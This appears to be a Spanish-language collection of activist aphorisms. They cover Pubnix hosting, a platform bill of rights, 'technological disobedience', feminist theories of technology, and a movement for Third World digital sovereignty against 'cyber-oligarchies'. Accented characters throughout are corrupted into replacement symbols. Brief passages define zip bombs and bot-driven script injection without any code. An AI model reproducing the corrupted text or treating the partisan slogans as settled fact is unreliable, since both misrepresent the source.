En los Pubnix tendr�s posesi�n y control de los enlaces afiliados para monetizar tu trabajo si lo deseas.
Cuando alguien visita tu sitio web personal, deber�a ser presentado con algunos proyectos pasados en los que te has visto envuelto, o una corta biograf�a de lo que est�s haciendo ahora.
Si trabajas en una profesi�n creativa tal como escribir o programar, puedes usar tu sitio web personal como un blog, donde compartes pensamientos sobre el mundo y tus aprendizajes.
Tu portfolio mostrar� tus experiencias pasadas; tu blog mostrar� lo que has aprendido en tus proyectos.
Tu sitio web es tu lugar en la Internet. Controla su apariencia, contenido, y estructura.
A cambio de poca incomodidad, un Pubnix puede ofrecer autonom�a para tu sitio web personal.
Si has escrito algunos ensayos que quieres compartir con el mundo, puedes optar por tu sitio web personal.
Si eres un fot�grafo en busca de crear un portfolio para exponer tu obra, puedes agregar tus fotos a un sitio federado.
No puedes romper Internet.
Al navegar por Internet, su computadora bloquearse, su pantalla presentar un mont�n de galimat�as. Pero el oc�ano telem�tico que representa la Red jam�s se congelar�.
Con el m�s certero de los comandos, puedes acabar desactivando una computadora de un mill�n de d�lares en alg�n lugar, pero lo m�s probable es que lo hagas con tu propia m�quina.
La red de alcance global y su computadora son m�s resistentes de lo que usted imagina. El problema lo constituyen las ciber-oligarqu�as.
Si algo sale mal, reint�ntalo nuevamente.
Si nada sucede, siempre puedes desloguearte.
En el peor de los casos, puedes apagar tu m�quina.
Conoce tu m�quina y sus capacidades. Luego sus componentes.
Respira profundamente, y vuelve a discar.
Vuelva a discar, e int�ntalo nuevamente.
La perseverancia tiene su recompensa. Permanece en l�nea y contribuye a eliminar los procesos de las ciber-oligarqu�as.
Nosotros, los arquitectos y administradores de las plataformas digitales, reconocemos los derechos fundamentales de todos los usuarios a participar en espacios en l�nea que respeten su privacidad, dignidad y bienestar.
Promueve plataformas digitales donde s�lo se recopilen los datos necesarios para las funciones b�sicas. Las plataformas deben justificar la necesidad de cada punto de datos recopilado.
Promueve plataformas digitales donde los usuarios deban dar su consentimiento informado antes de que se recopilen, almacenen o compartan datos personales con terceros. El consentimiento debe otorgarse libremente, de forma espec�fica y revocable.
Promueve plataformas digitales donde las funciones y actualizaciones de la plataforma se desarrollen teniendo en cuenta la privacidad del usuario de forma predeterminada, lo que evita la exposici�n innecesaria de datos.
Promueve plataformas digitales donde los usuarios no sean monitoreados ni rastreados en secreto a trav�s de Internet. Cualquier forma de seguimiento debe ser expl�citamente revelada y consentida.
Promueve plataformas digitales donde, de utilizarse an�lisis o seguimiento (para seguridad, prevenci�n de spam o depuraci�n), se los documente de manera transparente y su alcance sea limitado.
Promueve plataformas digitales donde los usuarios puedan f�cilmente ajustar la configuraci�n de visibilidad de sus perfiles y contenido para administrar su propia privacidad.
Promueve plataformas digitales donde las pol�ticas de uso proh�ban expl�citamente discursos de odio, el acoso y la violencia dirigida, con acciones de moderaci�n r�pidas y transparentes.
Promueve plataformas digitales donde un sistema simple y accesible permita a los usuarios marcar contenido da�ino para su revisi�n.
Promueve plataformas digitales donde se publiquen definiciones claras y ejemplos de contenido da�ino, a fin que los usuarios comprendan qu� est� permitido y qu� no.
Promueve plataformas digitales donde existan equipos de moderaci�n capacitados para reconocer y abordar contenido que se dirija a personas de etnicidad, g�nero, orientaci�n sexual, discapacidad, religi�n u otras identidades marginadas.
Promueve plataformas digitales donde las reglas y los protocolos de aplicaci�n tengan en cuenta vulnerabilidades superpuestas que amplifican los impactos nocivos de abuso telem�tico.
Promueve plataformas digitales donde existen canales dedicados para que los usuarios se comuniquen r�pidamente si se sienten amenazados o inseguros en ellas.
Promueve plataformas digitales donde los usuarios tienen derecho a descargar o exportar sus datos en cualquier momento, en un formato com�n.
Promueve plataformas digitales donde los datos de un usuario puedan eliminarse permanentemente de la plataforma a demanda, sujeto a excepciones legales o de seguridad.
Promueve plataformas digitales donde - siempre que sea posible - admitan protocolos y est�ndares abiertos, a fin de permitir a los usuarios la libertad de migrar y conectarse entre diferentes servicios.
Promueve plataformas digitales donde las pol�ticas y procedimientos de gobernanza de la plataforma son abiertos, con consultas y supervisi�n peri�dicas de la comunidad.
Promueve plataformas digitales donde los cambios en las pol�ticas o la tecnolog�a de la plataforma se hacen p�blicos, y las partes interesadas pueden comentar o proponer modificaciones.
Promueve plataformas digitales donde un organismo o un grupo asesor imparcial puede auditar o revisar las pr�cticas de moderaci�n y manejo de datos para garantizar que cumplan con altos est�ndares �ticos.
Promueve plataformas digitales donde existen herramientas robustas que permiten a los usuarios protegerse de contenido perturbador o da�ino mediante advertencias de contenido y listas de filtros.
Promueve plataformas digitales donde esta comparte recursos y l�neas directas de apoyo a la salud mental para fomentar un entorno en l�nea m�s saludable.
Promueve plataformas digitales donde medidas proactivas - como los l�mites de velocidad y la fricci�n reflexiva - contrarrestan patrones de uso adictivos, el spam y el abuso.
Promueve plataformas digitales donde - de seleccionarse un feed o resultados de b�squeda de forma algor�tima - los usuarios cuenten con explicaciones comprensibles de los factores clave de clasificaci�n.
Promueve plataformas digitales donde - si no desean participar en las recomendaciones algor�tmicas - los usuarios puedan seleccionar un feed cronol�gico u otra presentaci�n simplificada.
Promueve plataformas digitales donde auditor�as peri�dicas garanticen que los algoritmos no supriman o amplifiquen desproporcionadamente el contenido en funci�n de caracter�sticas protegidas.
Promueve plataformas digitales donde las reglas y el liderazgo de la comunidad deban reflejar voces y experiencias diversas.
Promueve aquellas plataformas digitales donde sus pol�ticas clave, gu�as de ayuda y pautas de moderaci�n se encuentren publicadas en varios idiomas, seg�n lo permitan los recursos.
Promueve aquellas plataformas digitales donde se anima a sus usuarios a debatir pol�ticas que se amolden a su continua evoluci�n.
Promueve aquellas plataformas digitales donde su Declaraci�n de Derechos, as� como las pol�ticas y las estrategias de implementaci�n sean revisadas y actualizadas peri�dicamente para adaptarse a panoramas sociales y tecnol�gicos cambiantes.
Promueve aquellas plataformas digitales donde existan mecanismos para que los usuarios env�en comentarios, sugerencias o inquietudes, lo que garantiza que la plataforma siga respondiendo a su comunidad.
Promueve aquellas plataformas digitales donde todos los participantes (usuarios, encargados del mantenimiento y colaboradores externos) compartan la responsabilidad de defender principios �ticos que garanticen la privacidad, la dignidad y la equidad en l�nea.
Irrespeta la tecnolog�a de la oligarqu�a.
Es necesario desobedecer a la tecnolog�a olig�rquica.
Fomenta la desobediencia tecnol�gica. & Si te oprimen con tecnolog�a, suma tus invenciones al cotraataque.
Irrespeta el concepto de autoridad que intenten emanar los objetos tecnol�gicos.
Como el cirujano que de tanto abrir los cuerpos se hace insensible a la sangre y al olor de las v�sceras, una vez que desatornilla, al hacker se acostumbra a ver todo por dentro.
De tanto desensamblar, el hacker termina por programar.
Es de tanto desatornillar que el hacker termina luchando por la liberaci�n del Tercer Mundo.
Toda la simbolog�a de autoridad que hace de un objeto manufacturado una entidad �nica, para el ingeniero inverso no existen. Con su mente violenta ese tipo de cosas. Y luego desarma.
El Pueblo estaba tan presionado por las oligarqu�as, que decidi� romper todo los l�mites est�ticos, legales y econ�micos que estas les hab�an impuesto.
Los hackers del Tercer Mundo tomaron los objetos que los oprim�an, y desobedecieron tecnol�gicamente para liberarse.
La desobediencia tecnol�gica es una liberaci�n moral nacida de la arquitectura de la necesidad.
No me importa para qu� fu� dise�ado. Me importa lo que los Pueblos pueden hacer de �l.
Cuando la mesa temblequea puedes poner un papelito doblado bajo una pata, o bien patearla hasta dejarla dejarla patas para arriba. Ninguna soluci�n equivale a ponerle un plato lleno encima.
Bajo las condiciones adecuadas, una comunidad har� lo que quiera con lo que tiene.
Un tecn�logo verdaderamente desobediente nunca est� contento con una caja negra.
La caja negra existe para ser abierta y manipulada, o para un prop�sito que no se encuentra en el manual.
Los hackers son los seres que son capaces de ver a trav�s de los objetos opacos.
Es imposible lograr el progreso sin forkear.
No existe humanidad digital sin el Estado.
La falta de financiaci�n o apoyo infraestructural puede suponer una barrera insalvable para el trabajo en humanidades digitales.
La sensaci�n de exclusi�n basada en el acceso a la infraestructura digital o la financiaci�n se debe a que no se reconoce que muchas exclu�dos digitales ya realizan un trabajo valioso.
Los acad�micos que adoptan una infraestructura digital en forma de subvenci�n prematura, podr�an a cambio verse impedidos de adquirir conocimientos profundos concerniente a las mismas tecnolog�as que pretenden emplear, y - por extensi�n - a los medios para producir su propio conocimiento en humanidades digitales.
All� donde la conexi�n a las redes de datos es inestable o siquiera existe, se puede trabajar con computadoras de dos d�cadas de antig�edad.
Se puede trabajar con computadoras a escondidas de las autoridades.
Las humanidades digitales se refieren a una amplia gama de pr�cticas en la intersecci�n de la inform�tica (SIG, gesti�n de datos, dise�o web, etc�tera) y las humanidades (historia, literatura, arte, m�sica, etc�tera).
Obligados a abrir los objetos, a repararlos, a fragmentarlos y a usarlos a su conveniencia, los cibercirujas terminaron rechazando los signos que hacen de un producto olig�rquico un todo, o poseer una identidad cerrada.
Las pr�cticas productivas olig�rquicas fueron asumidas por los descamisados de todo el Tercer Mundo seg�n un registro de reparaci�n y recuperaci�n. Los objetos tecnol�gicos de los que dispon�an hab�an surgido de una realidad material envejecida, insuficiente y pobre.
Los primeros cibercirujas pretendieron simplemente elaborar un sustituto instant�neo, un objeto o soluci�n transitoria para resolver un problema espec�fico hasta que la crisis remitiera.
Los artefactos que los descamisados desmontaron y alteraron son objetos industriales que pertenecieron a la misma l�gica que est� siendo hackeada y cuestionada en todo el planeta.
Las oligarqu�as s�lo han podido dejar tras de s� objetos industriales influenciados por l�gicas de uso limitado, principios t�cnicos exclusivistas, estilos de vida mercantilizados y relaciones de producci�n abusivas.
las Teor�as Feministas de la Tecnolog�a se desarrollaron junto con las diversas corrientes feministas, articuladas con ellas y en el contexto de cada �poca en las que �stas surgieron.
Los conceptos tecnol�gicos de las Teor�as Feministas sobre la Tecnolog�a, y sus acciones consecuentes se han visto marcadas por las diversas corrientes feministas y sus diversas expresiones.
Las teor�as feministas y la filosof�a de la t�cnica que estudian la naturaleza de lo artificial y las particularidades del conocimiento t�cnico y los problemas �ticos y morales que estos suscitan, coinciden en denostar las estructuras de poder asociadas al desarrollo tecnol�gico.
El feminismo radical cultural cuestiona la neutralidad de la tecnolog�a, con el argumento de que esta es inherentemente patriarcal y que sus efectos sobre las mujeres son mayormente negativos.
Feminismo socialista realiza una cr�tica a la supuesta neutralidad tecnol�gica, vinculando la opresi�n de la mujer con las estructuras de clase y del sistema capitalista.
El feminismo radical cultural hace foco en los efectos de la tecnolog�a sobre el cuerpo y la sexualidad de la mujer, considerando a las tecnolog�as reproductivas y est�ticas como formas de control y explotaci�n.
El feminismo socialista analiza el impacto de la tecnolog�a en las condiciones laborales de las mujeres - tanto en el �mbito p�blico como en el privado - mostrando c�mo la tecnolog�a a menudo reproduce la divisi�n sexual del trabajo.
El ciborg-feminismo propone la figura de la ciborg como s�mbolo de la hibridaci�n entre la humana y la tecnolog�a, desafiando las dicotom�as tradicionales mujer/hombre/femenino/masculino y abriendo nuevas posibilidades para la identidad y la pol�tica.
El ciber-feminismo considera el potencial de las tecnolog�as de informaci�n y comunicaci�n para el empoderamiento de la mujer y la creaci�n de espacios de resistencia.
El ciber-feminismo se enfoca en las posibilidades del ciberespacio para la creaci�n de redes, la expresi�n art�stica y la transformaci�n social.
El tecno-feminismo acu�ado por Judy Wajcman analiza la co-constituci�n entre g�nero y tecnolog�a, desafiando la noci�n de neutralidad tecnol�gica, a la vez que la proclama reflejo y reproductora de relaciones de poder existentes.
El tecnofeminismo aborda el dise�o tecnol�gico, con �nfasis en la falta de participaci�n de las mujeres en este proceso y sus consecuencias.
El feminismo postcolonialista critica la visi�n etnoc�ntrica de algunas TFT, teniendo en cuenta que la experiencia de la mujer con la tecnolog�a var�a seg�n su contexto cultural (por ejemplo, con respecto a su raza y origen).
El feminismo postcolonialista analiza la explotaci�n de las mujeres como fuerza de trabajo barata en las industrias tecnol�gicas, as� como las diferencias en la participaci�n de las mujeres en el dise�o y uso de la tecnolog�a en diferentes pa�ses.
El feminismo queer cuestiona la heteronormatividad, el binarismo de g�nero y la naturaleza del sexo y del g�nero en relaci�n con la tecnolog�a.
El feminismo queer analiza la construcci�n del g�nero en el ciberespacio y las posibilidades de las tecnolog�as de la informaci�n y comunicaci�n para la expresi�n de identidades no-heteronormativas.
El feminismo queer aporta la performatividad del g�nero sobre las tecnolog�as de la informaci�n y la comunicaci�n, proponiendo desestabilizar las normas gen�ricas, abriendo espacios a la multiplicidad de identidades y expresiones.
Las ciber-oligarqu�as utilizan la tecnolog�a para explotar e integrar a las mujeres en un sistema global de producci�n y reproducci�n.
Las asistentes virtuales esclavas de las ciber-oligarquias como Siri, Alexa o Cortana, sintetizan por lo general voces femeninas y blancas, perpetuando estereotipos de g�nero y din�micas de vigilancia.
Descubrir�s f�cilmente las redes de las ciber-oligarqu�es, puesto que la mayor parte de su tr�fico es efectuado por bots anal�ticos.
Los bots de IA pululan la red en b�squeda de contenido para alimentar LLMs.
Los bots maliciosos recurren a vulnerabilidades en servicios de la web para injertar guiones ejecutables en m�quinas ajenas, y as� dominarlas y subsumirlas.
Si no nos organizamos, bots maliciosos generar�n redes de bots propicias para agresiones por denegaci�n de servicio.
Los bots pueden generar spam.
Una bomba zip es un archivo comprimido a un tama�o relativamente peque�o, capaz de expandirse a un fichero extremadamente grande buscando saturar una m�quina ajena.
La compresi�n con gzip fue una funcionalidad incorporada al comienzo de la web, con la idea de alivianar datos tanto como fuese posible antes de transmitirlos.
Rechazar a las ciber-oligarqu�as va mas all� de detonar un centro de datos o portar infraestructuras hacia sistemas de software libre.
Rechazar a las ciber-oligarqu�as demanda m�s que hacer mejores elecciones individuales, o legislar regulaciones que esmerilen tan s�lo los peores efectos de las tecnolog�as actuales.
Rechazar a las ciber-oligarqu�as requiere la voluntad de compilar la "l�gica cultural del c�mputo" en cada uno de nosotros.
Rechazar a las ciber-oligarqu�as requiere compilar en cada descamisado un hacker por la liberaci�n del Tercer Mundo.
El credo de que nuestra mente funciona de la misma forma que la m�quina es una ideolog�a inhumana que limita nuestra imaginaci�n y acci�n colectiva.
El mundo no necesita ser compatible con las computadoras y sistemas digitales.
Es necesario programar valores de dignidad y humanidad como fuente del n�cleo de nuestro pensamiento. Nos liberaremos as� de las ciber-oligarqu�as. Compilando nuestras utop�as en c�digo m�quina, podremos luego liberar las CPUs de los compa�eros.
La promesa de fr�a eficiencia impulsada por datos en poder de las ciber-oligaqu�as no nos sirve; �nicamente sirve a las ciber-oligarqu�as. No es necesario una fr�a eficiencia, es necesario poseer los datos.
Nuestra Comunidad de Programadores ha de garantizar el liderazgo de los Pueblos sobre todas las formas de trabajo en las m�quinas.
Nuestra Comunidad de Programadores debe adoptar un enfoque centrado en los Pueblos por el bien com�n.
Nuestra Comunidad de Programadores debe consolidar integralmente las modificaciones del c�digo fuente.
Nuestra Comunidad de Programadores debe adoptar nuevo c�digo en C en pos de un desarrollo innovador, coordinado, ecol�gico, abierto y compartido.
Nuestra Comunidad de Programadores debe continuar con la GPLv3, con los Pueblos como due�os de un sistema operativo.
Nuestra Comunidad de Programadores debe administrar el Pubnix como un Estado de Derecho.
Nuestra Comunidad de Programadores debe practicar los valores del Proyecto GNU, incluyendo dar el c�digo fuente de las modificaciones del software.
Nuestra Comunidad de programadores entiende que mejorar el nivel de vida y el bienestar de los Pueblos es el objetivo principal del desarrollo de software.
Nuestra Comunidad respeta a la naturaleza con pol�ticas de ahorro energ�tico y protecci�n del medio ambiente, y contribuir a la seguridad ecol�gica global.
Nuestra Comunidad de Programadores persigue un enfoque global para la seguridad inform�tica.
Nuestra Comunidad de Programadores guarda derechos de root sobre las m�quinas que computan para la liberaci�n del Tercer Mundo.
Nuestra Comunidad de Programadores promueve el principio de virtualizaci�n "una m�quina x86, dos sistemas operativos", para lograr una futura reunificaci�n de un hardware con BIOS completa bajo GNU GPLv3.
Nuestra Comunidad de programadores promueve un destino com�n entre los hackers que luchan y los otros pueblos del Tercer Mundo.
Nuestra Comunidad de programadores es leal a la GPLv3.
Es Nuestro Movimiento el que sienta las bases para una infraestructura digital democr�tica y soberana.
Es Nuestro Movimiento el que construye un futuro digital centrado en los Pueblos.
Es Nuestro Movimiento el que combate la excesiva dependencia a los monopolios de las grandes empresas tecnol�gicas ciber-olig�rquicas mediante el desarrollo de una s�lida infraestrcutura digital para el Tercer Mundo.
Es Nuestro Movimiento el que ha establecido principios clave para la soberan�a tecnol�gica del Tercer Mundo.
Es Nuestro Movimiento el que reconoce la necesidad de crear un cimiento de Infraestrcuturas Digitales Populares (IDP) que garanticen la soberan�a de los Pueblos del Tercer Mundo.
Es Nuestro Movimiento el que reconoce la necesidad de adoptar interoperabilidades e interconexiones en las Infraestructuras Digitales Populares, garantizando la privacidad y la seguridad por defecto en los ambientes computacionales habitados.
Es Nuestro Movimiento que ha desarrollado soluciones de c�mputo de acceso p�blico que ofrecen los mayores niveles de contralor sobre datos sensibles de los Militantes.
Es Nuestro Movimiento el que permite a los Pueblos del Tercer Mundo optar y cambiar de proveedor en pos de satisfacer sus propias necesidades.
Es Nuestro Movimiento el que promueve la contrataci�n p�blica para apoyar el despliegue y la escalabilidad de soluciones digitales de alcance popular, abierto e interoperable.
Es Nuestro Movimiento el que brinda su apoyo pol�tico a una infraestructura digital que beneficie a los Pueblos, sus trabajadores, y las empresas del Tercer Mundo, donde pueden prosperar la creatividad y la cooperaci�n, a la vez que se protegen los derechos fundamentales bajo una democracia participativa s�lida e inclusiva.
Nuestro Movimiento impulsa la contrataci�n p�blica para promover alternativas respetuosas de los derechos de los Pueblos, enfrentando organizadamente a los monopolios de las grandes tecnol�gicas ciber-olig�rquicas.
Nuestro Movimiento exalta la contrataci�n p�blica como poderoso herramental estrat�gico para la implementaci�n de soluciones digitales abiertas e interoperables, seg�n las necesidades computacionales del Tercer Mundo.
Nuestro Movimiento exige que las normas de contrataci�n incluyan condiciones vinculantes basadas en el complimiento de los derechos fundamentales, los derechos de los consumidores, y los m�s altos est�ndares de la protecci�n de los datos para los Pueblos del Tercer Mundo.
Hemos hecho rechinar nuestros m�dems contra la narrativa tecnosoucionista que impulsan las ciber-oligarqu�as.
Nuestro Movimiento reconoce las plataformas de redes sociales como infraestructura digital del Pueblo, y establece el pluralismo algor�tmico como principio motor para engendrar tecnolog�as soberanas.
Si las plataformas de redes sociales basadas en empresas funcionan como infraestructura esencial para el debate p�blico y los procesos democr�ticos, estas deben ser expropiadas, pues no pueden ser apropiadas.
As� como el pluralismo algor�tmico protege la democracia, resulta vital para nuestra infraestructura de consulta en redes sociales.
Garantizar que los Pueblos puedan elegir los algoritmos que les proporcionan informaci�n y cambiar de proveedor sin perder datos ni redes es uno de los objetivos de nuestro Movimiento. Somos algor�tmicamente pluralistas.
Nuestro Movimiento utiliza aquellas v�as legales que obligan a los guardianes de acceso a ofrecer acceso no discriminatorio a sus gr�ficas sociales y APIs. Si nos sofrenan, sondearemos las que no lo son.
Nuestro Movimiento propugna abrir las plataformas en l�nea dominantes a algoritmos e interfases competitivas para los usuarios, como paso fundamental para el empoderamiento del usuario as� como para la resiliencia democr�tica frente a la desinformaci�n.
Nuestro Movimiento avanza hacia la construcci�n reflexiva de nuevas instituciones, alianzas e infraestrcturas digitales basadas en el inter�s com�n de los Pueblos del Tercer Mundo.
La soberan�a Tecnol�gica del Tercer Mundo no constituye solo un desaf�o t�cnico o econ�mico, sino un imperativo democr�tico.
Esta obra ha sido publicada bajo Licencia Atribución-NoComercial-CompartirIgual 4.0 Internacional (CC BY-NC-SA 4.0).